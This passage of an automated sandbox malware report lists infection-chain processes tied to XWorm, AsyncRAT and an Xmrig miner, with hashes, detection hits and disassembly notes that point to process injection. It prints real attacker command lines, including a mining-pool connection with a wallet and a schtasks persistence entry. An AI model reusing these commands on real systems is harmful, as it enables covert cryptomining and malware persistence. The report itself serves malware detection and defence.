Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Windows.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 86%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:42:23
Start date:	31/08/2024
Path:	C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
Imagebase:	0x680000
File size:	96'256 bytes
MD5 hash:	DB5717FD494495EEA3C8F7D4AB29D6B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 86%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:42:25
Start date:	31/08/2024
Path:	C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"
Imagebase:	0xef0000
File size:	96'256 bytes
MD5 hash:	DB5717FD494495EEA3C8F7D4AB29D6B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 86%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	16:42:25
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Imagebase:	0x5d0000
File size:	1'422'336 bytes
MD5 hash:	3ADFC7CF1E296C6FB703991C5233721D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:42:29
Start date:	31/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /k START "" "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" & EXIT
Imagebase:	0x7ff79b670000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	16:42:30
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:42:30
Start date:	31/08/2024
Path:	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Imagebase:	0x2b2f8250000
File size:	675'840 bytes
MD5 hash:	8083FED730E151BF47528621DB8E7FF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.2158620640.000002B2905D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.2158620640.000002B290305000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000025.00000002.2158620640.000002B290535000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:42:31
Start date:	31/08/2024
Path:	C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"
Imagebase:	0x209cd310000
File size:	675'840 bytes
MD5 hash:	8083FED730E151BF47528621DB8E7FF8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.2144035452.00000209CF22E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.2205943039.00000209DF53C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.2205943039.00000209DF514000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.2205943039.00000209DF6F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.2144035452.00000209CF270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000002.2205943039.00000209DF795000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs Detection: 82%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:42:33
Start date:	31/08/2024
Path:	C:\Users\user\Windows.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Windows.exe"
Imagebase:	0xc60000
File size:	96'256 bytes
MD5 hash:	DB5717FD494495EEA3C8F7D4AB29D6B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	16:42:33
Start date:	31/08/2024
Path:	C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
Imagebase:	0x181561d0000
File size:	675'840 bytes
MD5 hash:	8083FED730E151BF47528621DB8E7FF8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.2078804630.0000018167F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.2065045219.000001815801C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.2078804630.0000018168215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000028.00000002.2065045219.0000018157F36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	16:42:35
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe"
Imagebase:	0x7ff71e800000
File size:	550'912 bytes
MD5 hash:	85441D14F17C49EA015D5CC9C53FE164
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 64%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	16:42:36
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	16:42:41
Start date:	31/08/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	16:42:42
Start date:	31/08/2024
Path:	C:\Users\user\Pictures\Illumination.pif
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Pictures\Illumination.pif"
Imagebase:	0x870000
File size:	551'936 bytes
MD5 hash:	4D40EBB93AA34BF94D303C07C6A7E5E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	16:42:42
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x750000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	16:42:45
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50
Imagebase:	0x272d9270000
File size:	42'800 bytes
MD5 hash:	929EA1AF28AFEA2A3311FD4297425C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002E.00000002.4156132656.00000272D94EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002E.00000002.4108997136.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002E.00000002.4108997136.0000000140799000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	16:42:50
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Imagebase:	0x8c0000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	16:42:50
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0xca0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	16:42:50
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	16:42:58
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Imagebase:	0x470000
File size:	1'422'336 bytes
MD5 hash:	3ADFC7CF1E296C6FB703991C5233721D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B878BAE Relevance: 5.8, Strings: 3, Instructions: 2046COMMON

Download Yara Rule

Strings

ZQ_H, xrefs: 00007FFD9B878DA0
uT_A, xrefs: 00007FFD9B879CF4
`, xrefs: 00007FFD9B879A0A

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID:
String ID: ZQ_H$`$uT_A
API String ID: 0-4231590795
Opcode ID: 9cccc10fa6a5d33c0b02c2b509f351eb36aa590de93cdd41b4f455ddba3a194e
Instruction ID: 188dcbb87b98d6bef92ded6a9013ceefcfad5444be06ae97dd3fa24c57e62341
Opcode Fuzzy Hash: 9cccc10fa6a5d33c0b02c2b509f351eb36aa590de93cdd41b4f455ddba3a194e
Instruction Fuzzy Hash: EFE20831B2990E8BEB6CDB989495AE8B3E1FF59304F6501BDD05EC72D6DD24B8438780

Function 00007FFD9B8732D8 Relevance: 4.0, Strings: 1, Instructions: 2719COMMON

Download Yara Rule

Strings

|, xrefs: 00007FFD9B87C310

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 156c841dba154a85e25d6ba0bd711c0b5ca0b8c2692cff26c5f097aa966baf40
Instruction ID: 2118c79a20a9b5e8624dab46b6f6b607060f2d56fec4699bc544d18454963347
Opcode Fuzzy Hash: 156c841dba154a85e25d6ba0bd711c0b5ca0b8c2692cff26c5f097aa966baf40
Instruction Fuzzy Hash: D103C571B2990E4BEB6CEB5894A1BF973E2FF98304F5041B9D05EC32DADD246D828741

Function 00007FFD9B879FEB Relevance: 1.2, Instructions: 1227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a8fefdfeb9e2b550f885fb0c33c60751f5f5cf99ff13cc1ae68c1f3421614f
Instruction ID: 28537df188d7c20e9afa2a8ee1aaded923a1800d04afd588cfdb01f91a50dcbf
Opcode Fuzzy Hash: 00a8fefdfeb9e2b550f885fb0c33c60751f5f5cf99ff13cc1ae68c1f3421614f
Instruction Fuzzy Hash: 10B2B130A15146CAE3A8DF54C4E0631F7F2FF4A345B689ABEC0998B1A2C7359AC1D7D1

Function 00007FFD9B87B1E8 Relevance: .7, Instructions: 669
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c29b1cbe2b330abd6f7f2097eb0875f81f96044b595e797e969f10da7ada5a
Instruction ID: 879e97863d59dbdd0908d4ed3fa90e10b5101ec6df1616de33f4308d25029e25
Opcode Fuzzy Hash: 48c29b1cbe2b330abd6f7f2097eb0875f81f96044b595e797e969f10da7ada5a
Instruction Fuzzy Hash: 1532E420B189068BE75CEB6884B5B75F6E2FF58304F5045BEE06D871D7DE38A981C782

Function 00007FFD9B87597A Relevance: .2, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82942083cb4261723f39f9403bb6c5c0d73f7537e9e83e66e7ee4bf6c7a4cfc8
Instruction ID: 98124accacb667dc9baa006e1f584922f7824ff039d1d1dd2ac44bd5974f1083
Opcode Fuzzy Hash: 82942083cb4261723f39f9403bb6c5c0d73f7537e9e83e66e7ee4bf6c7a4cfc8
Instruction Fuzzy Hash: 28A19330A051468BD3A8DF14C0A0A31F7F1FF4930DB659ABAC19D8B2A2DA35D9C5DBD1

Function 00007FFD9B878454 Relevance: 1.9, APIs: 1, Instructions: 437
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFD9B8787EC

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3000774c5da8c038fe7b6d0ba18afe7cd27bd88d3b146e587d642babf2cbc20e
Instruction ID: ac862a37ded1a13cd2dcddc93d65adc9172f75ad57bff25635a5a28b56d0e040
Opcode Fuzzy Hash: 3000774c5da8c038fe7b6d0ba18afe7cd27bd88d3b146e587d642babf2cbc20e
Instruction Fuzzy Hash: F2D1A630A18A8D4FDB78DF18DC967E977D1FB59314F01422AE84EC7291DF74AA418B82

Function 00007FFD9B878231 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE ref: 00007FFD9B87831A

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e2a19a8fa01a0114bc873b11ae9494cdc3e7a34a8311ed3f50176376cb6ba5bf
Instruction ID: 5595f287cd2a1e2877d6dd841e9c041502032e3483f06dd71df9a79019dba41a
Opcode Fuzzy Hash: e2a19a8fa01a0114bc873b11ae9494cdc3e7a34a8311ed3f50176376cb6ba5bf
Instruction Fuzzy Hash: FF41F73190CB488FDB18DF5898566FD7BE0EF59321F0042AFE489D3292DA7468468781

Function 00007FFD9B878102 Relevance: 1.6, APIs: 1, Instructions: 141
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFD9B8781E5

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6a51e45f05458ca46caa7306ebf5cc5992f3cfdbb52eac7fe34718bffd09472e
Instruction ID: fcb7da82dee13d127f3ef34069ca81f1a86d4ffebb6c1eda2d25d3f0becb7731
Opcode Fuzzy Hash: 6a51e45f05458ca46caa7306ebf5cc5992f3cfdbb52eac7fe34718bffd09472e
Instruction Fuzzy Hash: 2041F63191CB5C8FDB28DF9898456FD7BE0FB98320F04826FE449D3252DB74A9458B82

Function 00007FFD9B877FF0 Relevance: 1.6, APIs: 1, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFD9B8780B3

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ab2bb1da2d1100441e1c2ae98b71de0aa47ffc9e1be1cc86de4c310572718efe
Instruction ID: 6573ef4141dd2ab0dd0a7268114e97d78d3bd1fb0721c4ff2a00660d2e184ae3
Opcode Fuzzy Hash: ab2bb1da2d1100441e1c2ae98b71de0aa47ffc9e1be1cc86de4c310572718efe
Instruction Fuzzy Hash: 79310B31A1CB4C4FDB1DAB6898166F97BE0EF55320F10436FD059C3292DB7468528BD5

Function 00007FFD9B877EE8 Relevance: 1.6, APIs: 1, Instructions: 126
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNELBASE ref: 00007FFD9B877FA4

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c0de63d2a56e8c14d79562288548a09c900b13b9e4d844c128de0f6d713c75f5
Instruction ID: 97cd4b7d6fbf390200f9e94a05c6639b432e95f6cb77de9cdfa63fbcabaec14e
Opcode Fuzzy Hash: c0de63d2a56e8c14d79562288548a09c900b13b9e4d844c128de0f6d713c75f5
Instruction Fuzzy Hash: 3C310631D0CB484FDB2C9FA8984A6F9BBE1EF55321F04426FD05AD3692DF7468068791

Function 00007FFD9B8789B2 Relevance: 1.6, APIs: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B878A6A

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 884811a77383fa8017b6b34e9e37b86a331c601670078852ecad9b4f88e4093d
Instruction ID: 41a54937eee38b79bd04937d937ae6253852f2328d76516a226113961ff4e715
Opcode Fuzzy Hash: 884811a77383fa8017b6b34e9e37b86a331c601670078852ecad9b4f88e4093d
Instruction Fuzzy Hash: FC31C23190CB488FDB1CDB9898456FD7BE1EB95321F04436FE449D3292DB74A8068782

Function 00007FFD9B877DED Relevance: 1.6, APIs: 1, Instructions: 116
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FFD9B877EA7

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 97010be95bdb58643930af8abbe5f9b4582b73e82fca11d3123aa123fa8a01d0
Instruction ID: f66677472f77b2d2a9a323cb970c02c2af8d85a19af0087de19a775537cc5e49
Opcode Fuzzy Hash: 97010be95bdb58643930af8abbe5f9b4582b73e82fca11d3123aa123fa8a01d0
Instruction Fuzzy Hash: 0431283190D7884FDB5ADB6898566E97FE0EF57320F0442AFD089C71A3DA785806C752

Non-executed Functions

Function 00007FFD9B877088 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666392754.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_trSK2fqPeB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9544701fb47d84f6b6d1ad7e1d57524844bb5f42aef3eef712c477111f2c7729
Instruction ID: 32c0a614bb76cf34668d5b55a341ec9bfcbef71de3398a1bd7bfa2940d94b56f
Opcode Fuzzy Hash: 9544701fb47d84f6b6d1ad7e1d57524844bb5f42aef3eef712c477111f2c7729
Instruction Fuzzy Hash: EA71A330A151468BE3A8DF14C0A4A35F7E1FF0930CB6596BAC19C8B2A6DA38D9C4C7D1

Analysis Process: 52i.exePID: 7972, Parent PID: 7808COMMON

Executed Functions

Function 00007FFD9BC33FD0 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 00007FFD9BC340E4

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 22937dca0a2647aeb06654a979c58c91aaeb72e58a7f86df825feb59d1b7fc90
Instruction ID: 6becc631dbfb732da80f9009c404c56e113af34394d80dddbc17a50ddaf53a68
Opcode Fuzzy Hash: 22937dca0a2647aeb06654a979c58c91aaeb72e58a7f86df825feb59d1b7fc90
Instruction Fuzzy Hash: F071FA53B0FA850FE778897C682117D7B91EF9936075942BFE0C8861FBD819AD428781

Function 00007FFD9BC36D8C Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

/<_H, xrefs: 00007FFD9BC3738D

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID: /<_H
API String ID: 0-2973824185
Opcode ID: e75214469f17beb5d39039b1391c36fdbac1da363901658d57e264cc53e3984a
Instruction ID: 78125b6d971ecc6f0684ae58fc3dd0d285809a1046fd66559667faa678757e5b
Opcode Fuzzy Hash: e75214469f17beb5d39039b1391c36fdbac1da363901658d57e264cc53e3984a
Instruction Fuzzy Hash: 7851DD61B1AA4D0BE7E89B3C44756B927C2FF98650BD5007AE44DC73E2ED297D024781

Function 00007FFD9BC31B78 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

